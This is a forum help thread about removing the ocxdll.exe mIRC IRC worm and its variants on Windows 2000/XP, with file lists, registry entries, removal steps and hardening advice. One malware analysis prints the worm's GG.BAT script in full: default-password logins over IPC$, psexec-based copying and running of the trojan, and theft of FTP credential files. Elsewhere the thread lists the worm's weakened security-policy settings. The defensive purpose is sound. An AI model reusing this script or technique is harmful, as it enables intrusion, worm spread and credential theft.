1. *** For people having problem deleting some executable files related to this ocxdll.exe Trojan/worm/virus, i.e. winhp32.exe, they were somewhat protected. However, you can probably successfully delete these files by renaming them from ˇ§.exeˇ¨ extension to ".txt". What a nasty thing they did...

2. mIRC Trojans use standard IRC ports (mostly 66 ˇV 6669) plus other ports, and sometimes they create backdoors in case the victims were blocking the standard IRC ports. In the case of the ocxdll.exe I have seen, it opened a backdoor port, 60609, so blocking IRC ports is just not enough.

In order to guard against this type of worm/virus/Trojans, application level personal firewalls would be my choice. These types of firewalls check each application specific incoming and outgoing connection attempt, which is the most effective way to protect systems. These types of firewalls will not let unknown incoming or outgoing traffic to pass the system. If unknown connection attempts are detected, these types of firewalls will ask for users' decision to permit or deny the connections.

For example, if a new virus/worm/Trojan gets into a network of 50 computers where each desktop has an application level personal firewall, this new Trojan/worm might not do as much damages comparing to a network without them.

I do not know much about viruses, but I am trying to clean things up..

Somehow I keep getting the HideMyPornoExe prompt with a run time error message every time I reboot my WIN2K machine. Any suggestions on getting rid of it?

I'm running the current Norton AntiVirus. Dual Pentium III.

Thanks,

HideMyPornoExe is not a pleasant name for a window is it? :)

HideMyPornoExe seems to be the hide window program.

Base on the symptom you described, it might indicate that your registry still has the registry value inserted by the virus/worm/trojan.

Here is what you should consider checking the windows registry:
1. Goto start->run and type "regedit"
2. Goto the following registry keys and identify string value "Run32dll" with data like "taskmngr.exe", "task32", "ocxdll.exe" or something suspicious.
a. HKey_local_machine//software//microsoft//windows//CurrentVersion//Run
b. HKey_local_machine//software//microsoft//windows//CurrentVersion//RunOnce
c. HKey_local_machine//software//microsoft//windows//CurrentVersion//RunService

3. Once you identified the infected registry value, delete that registry value. ***MAKE SURE YOU SELECT "RUN32DLL" REGISTRY VALUE ON THE RIGHT SIDE OF THE WINDOW. YOU SHOULD ONLY SEE 3 CHOICES WHEN YOU RIGHT CLICK: "MODIFY", "DELETE" AND "RENAME". IF YOU SEE MORE THAN 3 CHOICES, YOU ARE AT THE WRONG PLACE AND DO NOT CLICK "DELETE". IF YOU SEE ONLY 3 CHOICES, THEN RIGHT CLICK AND SELECT "DELETE." ***

That should stop this virus/worm/trojan from starting up each time you reboot your system, which will eventually stop the windows pop-up.

MAKE SURE you change your administrator and all user account passwords, or you will be infected again because the worm/trojan already reported your passwords back to the Trojan owner(s)...

My grisoft anti-virus detected the hidewindows and 'healed' it, but upon restarting, it still hangs. I can only ctrl*alt*delete to the Win task manager and manually start the a/v program or others. I have enough knowledge to be 'dangerous' but not enough to figure how to get to a "find" prompt or start the reg-edit type process to delete files or rename suspect files.

I have downloaded the Anti-Trojan program and will attempt to see if it finds anything that I missed. My Norton Antivirus program failed to detect these files as being viruses. Also, when NAV finally did detect them, it could not qurantine or repair them. If I happen to receive this file again, I will forward it to you Kyle. And I will install a firewall as recommended.

Be careful about mdm.exe. It COULD be a legit windows program. You need to right click on the mdm.exe file you found and check its file properties (right click on the file and goto properties), and click on the version tab to see the information about the file. If the comapny is Microsoft, original name is mdm.exe, product name is one of Microsoft products, you might be OK.

As I have mentioned many times, swat-it and ad-aware (you can search the links from my earlier comments) are complementary to the anti-virus software. anti-virus software alone is not enough.

If you can't seem to remove the files, run swat-it and ad-aware and let's see if they helps. Most likely they will remove a bunch of "bad" files for you.

Cheers,
/Kyle

Eversince I had the trojan that was listen here above I can't seem to share my internetconnection anymore . I can share directories ... but no Internet Connection . I have done al steps to remove the trojan ( see posting off aladin aladin168@hotmail.com 09/05/02 ) and to reset all userrights as before . But still it doesn't work .

What could it be ?

Hoping to hear from you .

I've installed XP now , changed most my passwords and I'm going to check my equifax reports.

One of my clients also got infected with ocxdll.exe virus. This
occurred back in 8/28/2002 at 3am. After some detailed analysis, I
have determined that it was a Trojan, deleted the detected registry
entries, delete the infected files, tighten the administrator ID and
password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) to restore the security policy (If they
have a backup .sdb file, then just reapply the security policy would
fix this part), add users back to local. The cause is bad security
(admin ID and passwords), and a backdoor to drop the ocxdll.exe.

Effected systems:
++
- Windows 2000. Security policies alteration was ONLY for Windows
2000
- Windows NT - might be infected, but will not distribute or change
security policies.

What did it do?
++
1. hide all programs it ran.
2. open backdoor, port 60609
3. Run mIRC client with random usernames listed in mdm.scr with more
random characters
4. It ran the bot (robot) scripts in the following order, which means
they contained malicious automated instructions.

[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replace security policy settings using Microsoft security editor
(SecEdit.exe /configure) command and reset the security policy to
default settings, and replace security settings in the TFT8675. This
is done in quiet mode.
6. It scans for 20 IP's and then start running "GG.BAT", which is the
real program that started the hacking.
7. It tries to hack into the system using the following user ID and
password. If you don't have these user id and passwords, maybe you
are just infected with 1 system, and it could not spread via this
Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then
probably these systems were hacked successfully. It copied the Trojan
OCXDLL.EXE to the compromised systems. If file were there, copy it
anyway, and do it quietly. (using psexec.exe -c -f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which
extracted the 17 files that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory.
(maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc
client.
12. The scripts were kicked in to HIDE the mirc window, so you can
ONLY see it in the process. You will see "taskmngr.exe" (NOT
taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either
attempt failed or attempt successful.
++
Disclaimer: The irc bot scripts have not fully analyzed. This is
what I understood so far. The removal instructions WILL remove the
trojan.
++

Impact:
++
This may be a random attack. However, there is a file, ncp.exe
involved, which is the NetCat program. This program allows the
hackers to gain full control to your system. Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data
were lost.
2. Worst-case scenario is that they have controlled your system and
implemented something new that are not yet detected.
3. The hacker has captured your IP address and knows that you were
vulnerable because the Trojan actually reported back to him/her.
++

How to remove the Trojan:
++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe
and dll16.ini (created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

**
**NOTE:
seced.bat is a decoy. This file was never used. The real instruction
for updating the configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never
used.

**

2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts mirc client program during the
windows startup)
3. Change the LOCAL Administrator password on ALL Systems! Make sure
they are strong passwords! Use mix of Uppercase, Lowercase, numbers,
and non-alphanumeric, i.e. _,+,=,), ...
4. If possible, change Administrator login ID to a different user_id.
This will stop the initial user_id guessing. (This will not stop the
more sophisticated hackers)
5. Restore the default security policy settings by typing "secedit
/configure C:\WINNT\security\Database\ secedit.sdb"
6. Goto start -> programs -> administrative tools -> Local Security
Policy, click on "User Rights Assignments", and add users and groups
back into the policy. "Access this computer from the network". The
default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[ SYSTEM_NAME]

Additional Recommendation:
--
1. Tighten your Firewall and ANY all unwanted traffic from accessing
ports, BOTH inside to outside, and outside to inside.
2. Rename your administrator user id to something else, and create a
user id called "Administrator" with NO GROUPS. This will allow you to
monitor anyone trying to use the "Administrator" login.
3. Setup security log, at minimum, log successful and failed
Logon/Logoff., and monitor the event logs.
++

More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts mirc client program during the
windows startup)

When MIRC client started running, it runs the scripts in dll32nt.hlp,
which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet". This meant "configure your system setting with the
default security policy, plus the additional settings in tftp8675".
It basically removed many security restrictions, remove all audits for
the systems, and of course remove all users in the "Local Users
allowed from the net".
List from TFTP8675:
--
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--

OCXDLL.EXE is a self-extracted file that included 17 files. It is a
Trojan and it's a worm. In the dll32nt.hlp, it has an instruction to
do IP scan, and store the 20 IP address it found. Mostly likely it
scanned the subnet and file server that were connected to the victim
systems at that time. Then it has an instruction at the end to run
GG.BAT, which is the instruction to attack the 20 IP's that just
found.

Here are the files that were extracted from ocxdll.exe:
++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++

Here is the GG.BAT text:
--
@echo off
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
--

It altered my registry as follows with "epgcj.exe" (virus)running on every boot up:

Key Name: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Class Name:
Last Write Time: 12/10/2002 - 11:37 PM
Value 0
Name: epgcj
Type: REG_SZ
Data: epgcj.exe 

Value 1
Name: MSKCES32
Type: REG_SZ
Data: C:\WINNT\msapps\dir\clt.exe

Value 2
Name: Synchronization Manager
Type: REG_SZ
Data: mobsync.exe /logon

Value 3
Name: TkBellExe
Type: REG_SZ
Data: C:\Program Files\Common Files\Real\Update_OB\evntsvc.exe -osboot

Note the date of this bugger:
12/10/2002
I believe QuickTime was also recently installed or updated? This machine had Administrator and no password! The machine also is not re-booted often so I am not sure when it was originally infected. I only located it when I noticed 2 quick DOS screens opening and closing during a recent boot, or log-on. I only figured it out when I logged on without internet connection present (disabled NIC card) message on log-on was:
"host not found= stole.no-ip.infoservice"

The actual ip of clone server, found in abcd.jpg file = 216.127.74.108

I searched my system for other files with the same or close dates and found a slew of them which I deleted (and saved copies). They were in WINNT\msapps\dir, and WINNT\system32.

One which was copied by a bat file from \system32 to WINNT\msapps\dir was msappsa.exe

Anyway, for part1 and part 2 of the technical analysis on the ocxdll.exe / taskmngr.exe original (not variants) Trojan, check out http://www.klcconsulting.net/mirc_virus_analysis.htm . Part 2 of the analysis gives the instructions to remove that Trojan/Worm/Virus.

People's concern about identity theft is VERY REAL. Some variants I analyzed have the capability of stealing any credit card, password info you saved on your computer. It means, if you ever click "save my password so I don't have to login next time", those passwords might have been stolen.

If you think the damage is bad, save critical files and format it and rebuild it, and do it right this time. It'll help to prevent the next virus/trojan attacks.

Here are the quick 10 steps I can recommend for re-building your system.
1. Backup your critical data
2. Format your system
3. Install Operating System
4. Rename your "Administrator" userID to something like "_admin" or "[name]_admin" (i.e. "kyle_admin") Make sure you memorize you did this, or write it down.
5. Rename your "Guest" userID to something else, i.e. "guest_user". Write down your changes.
6. Set strong passwords for your administrator account. Use combination of alphabets, numbers, and if possible, use special characters like "+", "_", "-" in the password to make it even harder to guess. Make the passwords at least 7 characters long.
7. Install following software (mentioned in 9/24/2002):
7a. Install an anti-virus software with the latest definition file. Paid anti-virus software is better. If you don't have one, download a free one, AVG Free edition. It has the with update capability too: http://www.grisoft.com

7b. Install an Anti-Trojan software on top of the Anti-Virus software. Anti-Virus software does not usually detect Trojans and Hacker software that were installed during an intrusions. Paid versions like Pest Patrol are good. If you don't have one, get a free one. It's great and it's Swat-IT by Lockdown Corp: http://lockdowncorp.com/bots/downloadswatit.html

7c. Install Ad-Aware software, which is for removing the advertising software that web advertisers installed on your systems without your acknowledgement. This happens simply by just surfing the Web... You'll be surprised how many adwares on your systems. This one is free and available at : http://www.ad-aware.com

7d. Get a personal Firewall for your computers. Symantec and McAfee also make personal firewalls and they are effective. If don't have one, Use the FREE firewall software, Zone Alarm. It's available at http://www.zonealarm.com

8. Make sure you have all the software patches up to date. This include the Operating System, Internet Explorer, Instant Messengers, Anti-virus, Anti-Trojan, Firewall software, and etc... Windows 2000 & XP have "Windows Update" features, so take advantage of that.

9. If you have cable modem/DSL services, get a Cable Modem/DSL Router, which usually have a built-in firewall. This router will be your first line of defense, and your systems are hiding behind it. If a virus or an intruder start an attack, your computer will not get hit directly. This adds another layer of defense.

10. If you are a technical person who uses "net stat", use TCPView from Sysinternals. It shows more information and it's easier to track viruses/Trojans. You can get that at http://www.sysinternals.com/ntw2k/source/tcpview.shtml.

If you follow these 10 steps, you should have a better experience this time.

My firm does more commercial forensic, virus analysis and IT security services. If your case is beyond the "home computers" and require special security services, feel free to contact me directly.

Good luck!
/Kyle

Anyway, I've removed Winclock from the registry, but it's still running mirc and UPDATE when it starts.

I'd rather not completely reinstall. Can someone summarize procedures for this variant?

Thanks,
/Kyle

Just thought I would put my 2 cents worth in.

Please tell us what OS you are using. If it's XP, you have to disable the system restore mode during the virus removal process, otherwise, every time you reboot, XP will restore your deleted files, possibly including viruses you removed.

To disable the system restore in XP, follow the direction from Symantec: http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/7e7f15291a25d938882567e50048a048/5065b3834b10031488256b0900255ea7?OpenDocument.

Cheers,
/Kyle

I didn't realise I had this until I tried to uninstall a few old programs to try and speed my system up. Eventually Win2k didn't boot up at all and I had a box asking if I wanted help connecting with mIRC. Not knowing what it was, I clicked no.

I had mIRC twice in the Uninstall Programs box, which it wouldn't let me ununstall as it was running. I couldn't find it in the task manager so I did a web search, found this site, and here was a reference to HideMyPornoExe, which I frequently saw on bootup but couldn't find!!

A lot of these files were found in my C:\windows\fonts directory if that helps.

I installed ZoneAlarm 10 minutes ago, and over 1700 intrusions have already been blocked, about 200 being "high rated"

I haven't seen the actual virus/worm/Trojan file; so if you have the file, please send it to me at kyle@kylelai.com for analysis.

This time it deceived victims by using the "explorer.exe" installed by this worm/Trojan. The REAL Windows explorer is located at "winnt\explorer.exe", but this Trojan installs its own explorer.exe at "%system%", which is usually "winnt\system32\explorer.exe."

Here is a list of files from this variant according to Symantec (http://securityresponse.symantec.com/avcenter/venc/data/backdoor.irc.zcrew.html .) File names have been completely changed, and might have new functionalities.

1. Create the following files in the %System% folder:
Bootdrv.dll *
Explore.dat
Explore.exe
Explorer.exe *
Iiscache.dll
Libparse.exe
Moo.dll *
Navdb.dbx
Psexec.exe *
Rcfg.ini
Rconnect.con
Rconnect.exe *
Secure.bat
Str.vxd
Svchost32.exe *
V32driver.bat
Web.swf *

2. Create the folder, %System%\www, in which it creates these files:
Mdx.dll*M
Moo.dll *
Views.mdx *

It also creates the registry value:

ccreg %system%\explorer.exe

in the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

PSEXESVC.EXE (60KB)
dire.exe (16KB)
newexplor.exe (16KB)
ratsou.exe (16KB)
tbbspu.exe (16KB)

"Servudaemon.exe - Entry Point Not Found"
"The procedure entry point SymGetLineFrom Addr could not be located in the dyanmic link library IMAGEHELP.dll"

Since you are having some error messages, maybe you are OK because the ServU FTP server couldn’t be started properly on your system.

Try to run anti-virus and anti-Trojan on your system to detect and remove this virus. Also, try to use the software on described on 9/24/2002 to help you secure your system(s).

Good luck,
/Kyle

I am not sure if you have a firewall on your network. If not, you will certainly get this worm/Trojan because it is very wild on the Internet. If you do have a firewall, make sure you close port 445 because that's what this Trojan uses.

Hope this helps,
/Kyle

Thanks for all who gives invaluable information here.

I believe I found 2 variants of this trojan from 2 Win2k machines in my office.

== the 1st variant ==
The original file is
- run32dll.exe

It expands itself to the following files:
- 32dllemu.txt
- blah1.gif
- cygwin1.dll
- firedaemon.exe
- msnmngr.exe
- pulist.exe
- services1.bat
- ServUStartUpLog.txt
- software.config
- tar.exe
- winlog.exe

This one will create a private ftp server on the victim machine...

== the 2nd variant ==
The original file is
- netmon32.exe

It expands itself to the following files:
- dpd.bat (script to brute force trying uid/passwd guessing)
- kabomon (reset security settings)
- kill.exe (killing a windows program)
- mnt32.exe (hide the window of a program)
- mnt32.scr (a list for picking random uid for mIRC)
- nt16.ini (IRC script?)
- nt32.ini (IRC script?)
- psexec.exe (execute a program remotely)
- start.bmp (?)
- twunk_16.exe (mIRC client)
- winhelper.exe (launching an application)
- winlogo.bmp (?)

I am not very familar in analysing those scripts. Therefore, i donno what this trojan is doing besides changing the security settings...

Kyle, do u want to have a copy of the trojan?

Thanks all again for the discussion..

run32dll.exe and netmon32.exe.

Thanks,
/Kyle

Please state your operating system and maybe I can give you my 2 cents.

/Kyle

--
Files in Worm.Win32.Randon Trojan variant - source: viruslist.com
http://www.viruslist.com/eng/viruslist.html?id=59741
--

- Deta.exe - HideWindows utility (WIn32 exe file)
- fControl.a - an IRC script (port scanning and infection remote computers)
- IfCOntrol.a - an IRC script (IRC-channels flooding and DDoS attacks (pinging different addresses) )
- incs.bat - BATCH file (lan resources password cracker)
- Libparse.exe is "PrcView" utility (Win32 EXE file)
- psexec.exe is "PsExec" utility (Win32 EXE file)
- rcfg.ini - IRC INI file (loading other scripts)
- rconnect.conf - configuration file
- reader.w - list of nicknames used by worm to establish connection with IRC-channels
- Sa.exe - TrojanDOwnloader.Win32.Apher
- scontrol.a - helper IRC script.
- sencs.bat - BAT file (this file is transfered to the remote computer to perform TrojanDownloader execution)
- systrey.exe - renamed mIRC client (Wind32 EXE file).

This is similar to the original mIRC worm/Trojan ocxdll.exe with more guessable users and passwords.

Be careful out there. Make sure you have strong passwords, and make sure port 445 & 139 are blocked on your firewall. Strong password is far more important though.

Good luck!
/Kyle

Best way to do this is to rename the file.

Rename "svchost32.exe" to "a.txt", then delete the file.

svchost32.exe is involved in many variants because most of the people will think this file is a system file... However, the real system file is called "svchost.exe"... clever...

One mIRC Trojan variant (TROJ_FLOOD.BI.D/IRC_ZCREW) is spreading wildly now, and one of its file is "svchost32.exe." I suspect that you might be infected this worm/Trojan. Please check http://www.klcconsulting.net/mirc_virus_analysis.htm

The best defense as I always mention, is to set STRONG PASSWORDS for all of your user accounts.

On 3/8/2003, I did a experiment to see how fast a Windows 2000 Professional system (honeypot), having the "administrator" userID with no password,can get infected with worms/Trojans on the Internet. I put honeypot on a cable modem for 5 hours, and I was infected with 2 IRC type of worm/Trojans within this time. If you are interested in the result of this experiment, the report will be available on 3/11/2003, on the KLC Consulting Website, http://www.klcconsulting.net/irc_experiment1.htm

Internet is a dangerous place if you don't properly secure yourself for it. Make sure you have Strong Passwords for all accounts you have! That's the least thing you should do.

Good luck!
/Kyle

Some of the things I've encountered thus far are:
- After several successful boot-ups, my Admin password was changed (remotely?) and I couldn't access the system at all. I had to use some creative programming and some 'white hat' hack-ware to recover it.
- Adware deleted almost 200 files right out of the gate!
- I found 'paradise.exe' on the system, but, SwatIt has yet to identify it (or its components) as a threat.
- Zone Alarm keeps notifying me of access attempts on ports 1026 and various others. (In the past 30 minutes alone, ZA has blocked 5 access attempts).

My questions are as follows:
1) I have NO idea how to change my admin pw back to what it was! *grin* Any help? I'm currently accessing my PC using the VERY unsafe default.
2) If SwatIt is not recognising paradise.exe, does anyone have any suggestions for removal?
3) How can I determine if ZA is finding legitimate threats or just regular network traffic? Thus far, it had blocked all access attempts.

Thanks in advance for your help!

In terms of recovering Windows 2000/XP password, it can be done relatively easy, it's off topic from this thread, but send me an email and we can discuss this in more details.

Regards,
/Kyle

Deloder worm is also an IRC based worm, and it has the similar characteristics as the original taskmngr.exe/ocxdll.exe, but it uploads a VNC Server component, which allows the worm/Trojan owner to remote control the compromised systems.

I published a detailed Deloder worm/Trojan analysis on 3/11/03, and it is available at http://www.klcconsulting.net/deloder_worm.htm

Cheers,
/Kyle

I think you probably haven't run the anti-virus and anti-Trojan software with the latest definition; otherwise you should also detect all deloder files and "syscnfg.exe". "syscnfg.exe" is another variant of mIRC worm/Trojan.

As stated in the "removal instruction" and "recommendation for protections" sections in my analysis (http://www.klcconsulting.net/deloder_worm.htm) , follow the steps and you will remove "syscnfg.exe" all together when you run the anti-virus and anti-Trojan, as well as protecting yourself for future attacks.

As to your questions:
1. Follow the steps in my deloder analysis.
2. inst.exe only ran once to expand the files inside it, then it activate the backdoors to run. So, Yes, You should delete inst.exe.
3. Yes, delete the entry, and then run Anti-Trojan/Anti-virus software with the latest definition.

XP systems:
As I have mentioned in my prior messages, If you have XP, disable the "system recovery" mode, do the virus scan, then reboot your system, and re-enable the automatic recovery. The instruction for disabling/enabling system recovery is on the Symantec website:
http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/7e7f15291a25d938882567e50048a048/5065b3834b10031488256b0900255ea7?OpenDocument

/Kyle

Also, check "startup" folder in all of the subfolders under "[drive]\documents and settings\" and look at the properties of the shortcuts and see if anyone of them point to "clt.exe". If they do, delete them.

Let us know how it goes.

Cheers,
/Kyle

Joe: Yes, deleting it should resolve your problem.

Matt:
Did you run through the 4 programs mentioned in 9/24/2002? If you haven't, please go through them and give us an update.

Cheers,
/Kyle

Yes, delete that registry value should help. Can you please rename the file syscnfg.exe to syscnfg.txt and zip that file and send it to me at kyle@kylelai.com?

Also, use Windows explorer and goto d:\winnt\fonts\ directory and use the search function by right clicking on the "fonts" directory and select "search", do a search of *.* in this directory, you should see the "font2" directory. Delete this directory should remove the virus completely.

Good luck,
/Kyle

If not, then try to defrag your hard drive... maybe that will help a bit.

If not, then there might be some conflicts between softwares, might be on some dll's... If it seriously irritate you, then you might want to re-install the OS.

Good luck,
/Kyle

ocxdll.exe, Deloder worms, and several other IRC worm variants are getting worse, and sadly, it is a trend for the virus writers because it's effective, and many home users still leave their computers unsecured. Many new worms and Trojans come with password list. The password list for guessing administrator accounts are growing, which means if you have weak passwords, these worms will most likely get into your systems. A sample of these passwords can be found in http://www.klcconsulting.net/mirc_virus_analysis.htm and http://www.klcconsulting.net/deloder_worm.htm

Be certain to secure your systems with anti-virus, Anti-Trojans, and firewalls. The posting from 9/24 have links to free utilities that you can use to secure your systems. By securing your system, you can prevent many viruses, worms and Trojans from entering your systems.

Best luck to all,
/Kyle